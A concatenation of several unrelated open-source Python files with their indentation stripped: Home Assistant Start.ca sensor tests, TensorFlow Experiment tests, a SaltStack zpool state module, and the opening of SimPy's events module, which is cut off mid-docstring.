state = hass.states.get('sensor.start_ca_data_limit')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == 'inf'
state = hass.states.get('sensor.start_ca_used_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
state = hass.states.get('sensor.start_ca_used_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
state = hass.states.get('sensor.start_ca_used_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '0.0'
state = hass.states.get('sensor.start_ca_grace_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_grace_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_grace_total')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '311.43'
state = hass.states.get('sensor.start_ca_total_download')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '304.95'
state = hass.states.get('sensor.start_ca_total_upload')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == '6.48'
state = hass.states.get('sensor.start_ca_remaining')
assert state.attributes.get('unit_of_measurement') == 'GB'
assert state.state == 'inf'
@asyncio.coroutine
def test_bad_return_code(hass, aioclient_mock):
"""Test handling a return code that isn't HTTP OK."""
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
status=404)
scd = StartcaData(hass.loop, async_get_clientsession(hass),
'NOTAKEY', 400)
result = yield from scd.async_update()
assert result is False
@asyncio.coroutine
def test_bad_json_decode(hass, aioclient_mock):
"""Test decoding invalid json result."""
aioclient_mock.get('https://www.start.ca/support/usage/api?key='
'NOTAKEY',
text='this is not xml')
scd = StartcaData(hass.loop, async_get_clientsession(hass),
'NOTAKEY', 400)
result = yield from scd.async_update()
assert result is False
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
import tempfile
import threading
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, export_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
(export_dir_base, export_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(1, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEquals(6, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.1)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_delay_secs=0,
continuous_eval_throttle_secs=0,
continuous_eval_predicate_fn=_predicate_fn)
ex.continuous_eval(evaluate_checkpoint_only_once=False)
self.assertEquals(3, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_run_local(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_and_evaluate(self):
est = TestEstimator()
export_strategy = saved_model_export_utils.make_export_strategy(
est, 'export_input')
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
export_strategies=export_strategy)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, est.export_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'task': {
'type': run_config_lib.TaskType.PS,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host2:2222',
num_cores=15,
gpu_memory_fraction=0.314,)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls(
[test.mock.call().start(), test.mock.call().join()])
@test.mock.patch.object(server_lib, 'Server')
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
def test_continuous_eval_evaluates_checkpoint_once(self):
# Temporarily disabled until we figure out the threading story on Jenkins.
return
# pylint: disable=unreachable
# The TestEstimator will raise StopIteration the second time evaluate is
# called.
ex = experiment.Experiment(
TestEstimator(max_evals=1),
train_input_fn='train_input',
eval_input_fn='eval_input')
# This should not happen if the logic restricting evaluation of the same
# checkpoint works. We do need some checkpoint though, otherwise Experiment
# will never evaluate.
ex.estimator.fake_checkpoint()
# Start a separate thread with continuous eval
thread = threading.Thread(
target=lambda: ex.continuous_eval(delay_secs=0, throttle_delay_secs=0))
thread.start()
# The thread will die if it evaluates twice, and we should never evaluate
# twice since we don't write another checkpoint. Since we did not enable
# throttling, if it hasn't died after two seconds, we're good.
thread.join(2)
self.assertTrue(thread.is_alive())
# But we should have evaluated once.
count = ex.estimator.eval_count
self.assertEquals(1, count)
if __name__ == '__main__':
test.main()
| |
"""
States for managing zpools
:maintainer: Jorge Schrauwen <sjorge@blackdot.be>
:maturity: new
:depends: salt.utils.zfs, salt.modules.zpool
:platform: smartos, illumos, solaris, freebsd, linux
.. versionadded:: 2016.3.0
.. versionchanged:: 2018.3.1
Big refactor to remove duplicate code, better type conversions and improved
consistency in output.
.. code-block:: yaml
oldpool:
zpool.absent:
- export: true
newpool:
zpool.present:
- config:
import: false
force: true
- properties:
comment: salty storage pool
- layout:
- mirror:
- /dev/disk0
- /dev/disk1
- mirror:
- /dev/disk2
- /dev/disk3
partitionpool:
zpool.present:
- config:
import: false
force: true
- properties:
comment: disk partition salty storage pool
ashift: '12'
feature@lz4_compress: enabled
- filesystem_properties:
compression: lz4
atime: on
relatime: on
- layout:
- /dev/disk/by-uuid/3e43ce94-77af-4f52-a91b-6cdbb0b0f41b
simplepool:
zpool.present:
- config:
import: false
force: true
- properties:
comment: another salty storage pool
- layout:
- /dev/disk0
- /dev/disk1
.. warning::
The layout will never be updated, it will only be used at time of creation.
It's a whole lot of work to figure out if a devices needs to be detached, removed,
etc. This is best done by the sysadmin on a case per case basis.
Filesystem properties are also not updated, this should be managed by the zfs state module.
"""
import logging
import os
from salt.utils.odict import OrderedDict
log = logging.getLogger(__name__)
# Define the state's virtual name
__virtualname__ = "zpool"
def __virtual__():
"""
Provides zpool state
"""
if not __grains__.get("zfs_support"):
return False, "The zpool state cannot be loaded: zfs not supported"
return __virtualname__
def _layout_to_vdev(layout, device_dir=None):
"""
Turn the layout data into usable vdevs spedcification
We need to support 2 ways of passing the layout:
.. code::
layout_new:
- mirror:
- disk0
- disk1
- mirror:
- disk2
- disk3
.. code:
layout_legacy:
mirror-0:
disk0
disk1
mirror-1:
disk2
disk3
"""
vdevs = []
# NOTE: check device_dir exists
if device_dir and not os.path.exists(device_dir):
device_dir = None
# NOTE: handle list of OrderedDicts (new layout)
if isinstance(layout, list):
# NOTE: parse each vdev as a tiny layout and just append
for vdev in layout:
if isinstance(vdev, OrderedDict):
vdevs.extend(_layout_to_vdev(vdev, device_dir))
else:
if device_dir and vdev[0] != "/":
vdev = os.path.join(device_dir, vdev)
vdevs.append(vdev)
# NOTE: handle nested OrderedDict (legacy layout)
# this is also used to parse the nested OrderedDicts
# from the new layout
elif isinstance(layout, OrderedDict):
for vdev in layout:
# NOTE: extract the vdev type and disks in the vdev
vdev_type = vdev.split("-")[0]
vdev_disk = layout[vdev]
# NOTE: skip appending the dummy type 'disk'
if vdev_type != "disk":
vdevs.append(vdev_type)
# NOTE: ensure the disks are a list (legacy layout are not)
if not isinstance(vdev_disk, list):
vdev_disk = vdev_disk.split(" ")
# NOTE: also append the actualy disks behind the type
# also prepend device_dir to disks if required
for disk in vdev_disk:
if device_dir and disk[0] != "/":
disk = os.path.join(device_dir, disk)
vdevs.append(disk)
# NOTE: we got invalid data for layout
else:
vdevs = None
return vdevs
def present(
name, properties=None, filesystem_properties=None, layout=None, config=None
):
"""
ensure storage pool is present on the system
name : string
name of storage pool
properties : dict
optional set of properties to set for the storage pool
filesystem_properties : dict
optional set of filesystem properties to set for the storage pool (creation only)
layout: dict
disk layout to use if the pool does not exist (creation only)
config : dict
fine grain control over this state
.. note::
The following configuration properties can be toggled in the config parameter.
- import (true) - try to import the pool before creating it if absent
- import_dirs (None) - specify additional locations to scan for devices on import (comma-separated)
- device_dir (None, SunOS=/dev/dsk, Linux=/dev) - specify device directory to prepend for none
absolute device paths
- force (false) - try to force the import or creation
.. note::
It is no longer needed to give a unique name to each top-level vdev, the old
layout format is still supported but no longer recommended.
.. code-block:: yaml
- mirror:
- /tmp/vdisk3
- /tmp/vdisk2
- mirror:
- /tmp/vdisk0
- /tmp/vdisk1
The above yaml will always result in the following zpool create:
.. code-block:: bash
zpool create mypool mirror /tmp/vdisk3 /tmp/vdisk2 mirror /tmp/vdisk0 /tmp/vdisk1
.. warning::
The legacy format is also still supported but not recommended,
because ID's inside the layout dict must be unique they need to have a suffix.
.. code-block:: yaml
mirror-0:
/tmp/vdisk3
/tmp/vdisk2
mirror-1:
/tmp/vdisk0
/tmp/vdisk1
.. warning::
Pay attention to the order of your dict!
.. code-block:: yaml
- mirror:
- /tmp/vdisk0
- /tmp/vdisk1
- /tmp/vdisk2
The above will result in the following zpool create:
.. code-block:: bash
zpool create mypool mirror /tmp/vdisk0 /tmp/vdisk1 /tmp/vdisk2
Creating a 3-way mirror! While you probably expect it to be mirror
root vdev with 2 devices + a root vdev of 1 device!
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
# config defaults
default_config = {
"import": True,
"import_dirs": None,
"device_dir": None,
"force": False,
}
if __grains__["kernel"] == "SunOS":
default_config["device_dir"] = "/dev/dsk"
elif __grains__["kernel"] == "Linux":
default_config["device_dir"] = "/dev"
# merge state config
if config:
default_config.update(config)
config = default_config
# ensure properties are zfs values
if properties:
properties = __utils__["zfs.from_auto_dict"](properties)
elif properties is None:
properties = {}
if filesystem_properties:
filesystem_properties = __utils__["zfs.from_auto_dict"](filesystem_properties)
elif filesystem_properties is None:
filesystem_properties = {}
# parse layout
vdevs = _layout_to_vdev(layout, config["device_dir"])
if vdevs:
vdevs.insert(0, name)
# log configuration
log.debug("zpool.present::%s::config - %s", name, config)
log.debug("zpool.present::%s::vdevs - %s", name, vdevs)
log.debug("zpool.present::%s::properties - %s", name, properties)
log.debug(
"zpool.present::%s::filesystem_properties - %s", name, filesystem_properties
)
# ensure the pool is present
ret["result"] = False
# don't do anything because this is a test
if __opts__["test"]:
if __salt__["zpool.exists"](name):
ret["result"] = True
ret["comment"] = "storage pool {} is {}".format(name, "uptodate")
else:
ret["result"] = None
ret["changes"][name] = "imported" if config["import"] else "created"
ret["comment"] = "storage pool {} would have been {}".format(
name, ret["changes"][name]
)
# update pool
elif __salt__["zpool.exists"](name):
ret["result"] = True
# fetch current pool properties
properties_current = __salt__["zpool.get"](name, parsable=True)
# build list of properties to update
properties_update = []
if properties:
for prop in properties:
# skip unexisting properties
if prop not in properties_current:
log.warning(
"zpool.present::%s::update - unknown property: %s", name, prop
)
continue
# compare current and wanted value
if properties_current[prop] != properties[prop]:
properties_update.append(prop)
# update pool properties
for prop in properties_update:
res = __salt__["zpool.set"](name, prop, properties[prop])
if res["set"]:
if name not in ret["changes"]:
ret["changes"][name] = {}
ret["changes"][name][prop] = properties[prop]
else:
ret["result"] = False
if ret["comment"] == "":
ret["comment"] = "The following properties were not updated:"
ret["comment"] = "{} {}".format(ret["comment"], prop)
if ret["result"]:
ret["comment"] = (
"properties updated" if ret["changes"] else "no update needed"
)
# import or create the pool (at least try to anyway)
else:
# import pool
if config["import"]:
mod_res = __salt__["zpool.import"](
name,
force=config["force"],
dir=config["import_dirs"],
)
ret["result"] = mod_res["imported"]
if ret["result"]:
ret["changes"][name] = "imported"
ret["comment"] = "storage pool {} was imported".format(name)
# create pool
if not ret["result"] and vdevs:
log.debug("zpool.present::%s::creating", name)
# execute zpool.create
mod_res = __salt__["zpool.create"](
*vdevs,
force=config["force"],
properties=properties,
filesystem_properties=filesystem_properties
)
ret["result"] = mod_res["created"]
if ret["result"]:
ret["changes"][name] = "created"
ret["comment"] = "storage pool {} was created".format(name)
elif "error" in mod_res:
ret["comment"] = mod_res["error"]
else:
ret["comment"] = "could not create storage pool {}".format(name)
# give up, we cannot import the pool and we do not have a layout to create it
if not ret["result"] and not vdevs:
ret["comment"] = (
"storage pool {} was not imported, no (valid) layout specified for"
" creation".format(name)
)
return ret
def absent(name, export=False, force=False):
"""
ensure storage pool is absent on the system
name : string
name of storage pool
export : boolean
export instead of destroy the zpool if present
force : boolean
force destroy or export
"""
ret = {"name": name, "changes": {}, "result": None, "comment": ""}
# log configuration
log.debug("zpool.absent::%s::config::force = %s", name, force)
log.debug("zpool.absent::%s::config::export = %s", name, export)
# ensure the pool is absent
if __salt__["zpool.exists"](name): # looks like we need to do some work
mod_res = {}
ret["result"] = False
# NOTE: handle test
if __opts__["test"]:
ret["result"] = True
# NOTE: try to export the pool
elif export:
mod_res = __salt__["zpool.export"](name, force=force)
ret["result"] = mod_res["exported"]
# NOTE: try to destroy the pool
else:
mod_res = __salt__["zpool.destroy"](name, force=force)
ret["result"] = mod_res["destroyed"]
if ret["result"]: # update the changes and comment
ret["changes"][name] = "exported" if export else "destroyed"
ret["comment"] = "storage pool {} was {}".format(name, ret["changes"][name])
elif "error" in mod_res:
ret["comment"] = mod_res["error"]
else: # we are looking good
ret["result"] = True
ret["comment"] = "storage pool {} is absent".format(name)
return ret
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
| |
"""
This module contains the basic event types used in SimPy.
The base class for all events is :class:`Event`. Though it can be directly
used, there are several specialized subclasses of it.
.. autosummary::
~simpy.events.Event
~simpy.events.Timeout
~simpy.events.Process
~simpy.events.AnyOf
~simpy.events.AllOf
This module also defines the :exc:`Interrupt` exception.
"""
from simpy._compat import PY2
if PY2:
import sys
PENDING = object()
"""Unique object to identify pending values of events."""
URGENT = 0
"""Priority of interrupts and process initialization events."""
NORMAL = 1
"""Default priority used by events."""
class Event(object):
"""An event that may happen at some point in time.
An event
- may happen (:attr:`triggered` is ``False``),
- is going to happen (:attr:`triggered` is ``True``) or
- has happened (:attr:`processed` is ``True``).
Every event is bound to an environment *env* and is initially not
triggered. Events are scheduled for processing by the environment after
they are triggered by either :meth:`succeed`, :meth:`fail` or
:meth:`trigger`. These methods also set the *ok* flag and the *value* of
the event.
An event has a list of :attr:`callbacks`. A callback can be any callable.
Once an event gets processed, all callbacks will be invoked with the event
as the single argument. Callbacks can check if the event was successful by
examining *ok* and do further processing with the *value* it has produced.
Failed events are never silently ignored and will raise an exception upon
being processed. If a callback handles an exception, it must set :attr:`defused`
to ``True`` to prevent this.
This class also implements ``__and__()`` (``&``) and ``__or__()`` (``|``).
If you concatenate two events using one of these operators,
a :class:`Condition` event is generated that lets you wait for both or one
of them.
"""
def __init__(self, env):
self.env = env
"""The :class:`~simpy.core.Environment` the event lives in."""
self.callbacks = []
"""List of functions that are called when the event is processed."""
self._value = PENDING
def __repr__(self):
"""Return the description of the event (see :meth:`_desc`) with the id
of the event."""
return '<%s object at 0x%x>' % (self._desc(), id(self))
def _desc(self):
"""Return a string *Event()*."""
return '%s()' % self.__class__.__name__
@property
def triggered(self):
"""Becomes ``True`` if the event has been triggered and its callbacks
are about to be invoked."""
return self._value is not PENDING
@property
def processed(self):
"""Becomes ``True`` if the event has been processed (e.g., its
callbacks have been invoked)."""
return self.callbacks is None
@property
def ok(self):
"""Becomes ``True`` when the event has been triggered successfully.
A "successful" event is one triggered with :meth:`succeed()`.
:raises AttributeError: if accessed before the event is triggered.
"""
return self._ok
@property
def defused(self):
"""Becomes ``True`` when the failed event's exception is "defused".
When an event fails (i.e. with :meth:`fail()`), the failed event's
`value` is an exception that will be re-raised when the
:class:`~simpy.core.Environment` processes the event (i.e. in
:meth:`~simpy.core.Environment.step()`).
It is also possible for the failed event's exception to be defused by
setting :attr:`defused` to ``True`` from an event callback. Doing so
prevents the event's exception from being re-raised when the event is
processed by the :class:`~simpy.core.Environment`.
"""
return hasattr(self, '_defused')
@defused.setter
def defused(self, value):
self._defused = True
@property
def value(self):
"""The value of the event if it is available.
The value is available when the event has been triggered.
Raises :exc:`AttributeError` if the value is not yet available.
"""
if self._value is PENDING:
raise AttributeError('Value of %s is not yet available' % self)
return self._value
def trigger(self, event):
"""Trigger the event with the state and value of the provided *event*.
Return *self* (this event instance).
This method can be used directly as a callback function to trigger
chain reactions.
"""
self._ok = event._ok
self._value = event._value
self.env.schedule(self)
def succeed(self, value=None):
"""Set the event's value, mark it as successful and schedule it for
processing by the environment. Returns the event instance.
Raises :exc:`RuntimeError` if this event has already been triggerd.
"""
if self._value is not PENDING:
raise RuntimeError('%s has already been triggered' % self)
self._ok = True
self._value = value
self.env.schedule(self)
return self
def fail(self, exception):
"""Set *exception* as the events value, mark it as failed and schedule
it for processing by the environment. Returns the event instance.
Raises :exc:`ValueError` if *exception* is not an :exc:`Exception`.
Raises :exc:`RuntimeError` if this event has already been triggered.
"""
if self._value is not PENDING:
raise RuntimeError('%s has already been triggered' % self)
if not isinstance(exception, BaseException):
raise ValueError('%s is not an exception.' % exception)
self._ok = False
self._value = exception
self.env.schedule(self)
return self
def __and__(self, other):
"""Return a :class:`~simpy.events.Condition` that will be triggered if
both, this event and *other*, have been processed."""
return Condition(self.env, Condition.all_events, [self, other])
def __or__(self, other):
"""Return a :class:`~simpy.events.Condition` that will be triggered if
either this event or *other* have been processed (or even both, if they
happened concurrently)."""
return Condition(self.env, Condition.any_events, [self, other])
class Timeout(Event):
"""A :class:`~simpy.events.Event` that gets triggered after a *delay* has
passed.
This event is automatically triggered when it is created.
"""
def __init__(self, env, delay, value=None):
if delay < 0:
raise ValueError('Negative delay %s' % delay)
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = env
self.callbacks = []
self._value = value
self._delay = delay
self._ok = True
env.schedule(self, NORMAL, delay)
def _desc(self):
"""Return a string *Timeout(delay[, value=value])*."""
return '%s(%s%s)' % (self.__class__.__name__, self._delay,
'' if self._value is None else
(', value=%s' % self._value))
class Initialize(Event):
"""Initializes a process. Only used internally by :class:`Process`.
This event is automatically triggered when it is created.
"""
def __init__(self, env, process):
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = env
self.callbacks = [process._resume]
self._value = None
# The initialization events needs to be scheduled as urgent so that it
# will be handled before interrupts. Otherwise a process whose
# generator has not yet been started could be interrupted.
self._ok = True
env.schedule(self, URGENT)
class Interruption(Event):
"""Immediately schedules an :class:`Interrupt` exception with the given
*cause* to be thrown into *process*.
This event is automatically triggered when it is created.
"""
def __init__(self, process, cause):
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = process.env
self.callbacks = [self._interrupt]
self._value = Interrupt(cause)
self._ok = False
self._defused = True
if process._value is not PENDING:
raise RuntimeError('%s has terminated and cannot be interrupted.' %
process)
if process is self.env.active_process:
raise RuntimeError('A process is not allowed to interrupt itself.')
self.process = process
self.env.schedule(self, URGENT)
def _interrupt(self, event):
# Ignore dead processes. Multiple concurrently scheduled interrupts
# cause this situation. If the process dies while handling the first
# one, the remaining interrupts must be ignored.
if self.process._value is not PENDING:
return
# A process never expects an interrupt and is always waiting for a
# target event. Remove the process from the callbacks of the target.
self.process._target.callbacks.remove(self.process._resume)
self.process._resume(self)
class Process(Event):
"""Process an event yielding generator.
A generator (also known as a coroutine) can suspend its execution by
yielding an event. ``Process`` will take care of resuming the generator
with the value of that event once it has happened. The exception of failed
events is thrown into the generator.
``Process`` itself is an event, too. It is triggered, once the generator
returns or raises an exception. The value of the process is the return
value of the generator or the exception, respectively.
.. note::
Python version prior to 3.3 do not support return statements in
generators. You can use :meth:~simpy.core.Environment.exit() as
a workaround.
Processes can be interrupted during their execution by :meth:`interrupt`.
"""
def __init__(self, env, generator):
if not hasattr(generator, 'throw'):
# Implementation note: Python implementations differ in the
# generator types they provide. Cython adds its own generator type
# in addition to the CPython type, which renders a type check
# impractical. To workaround this issue, we check for attribute
# name instead of type and optimistically assume that all objects
# with a ``throw`` attribute are generators (the more intuitive
# name ``__next__`` cannot be used because it was renamed from
# ``next`` in Python 2).
# Remove this workaround if it causes issues in production!
raise ValueError('%s is not a generator.' % generator)
# NOTE: The following initialization code is inlined from
# Event.__init__() for performance reasons.
self.env = env
self.callbacks = []
self._value = PENDING
self._generator = generator
# Schedule the start of the execution of the process.
self._target = Initialize(env, self)
def _desc(self):
"""Return a string *Process(process_func_name)*."""
return '%s(%s)' % (self.__class__.__name__, self._generator.__name__)
@property
def target(self):
"""The event that the process is currently waiting for.
Returns ``None`` if the process is dead or it is currently being
interrupted.
"""
return self._target
@property
def is_alive(self):
"""``True`` until the process generator exits."""
return self._value is PENDING
def interrupt(self, cause=None):
"""Interupt this process optionally providing a *cause*.
A process cannot be interrupted if it already terminated. A process can
also not interrupt itself. Raise a :exc:`RuntimeError` in these
cases.
"""
Interruption(self, cause)
def _resume(self, event):
"""Resumes the execution of the process with the value of *event*. If
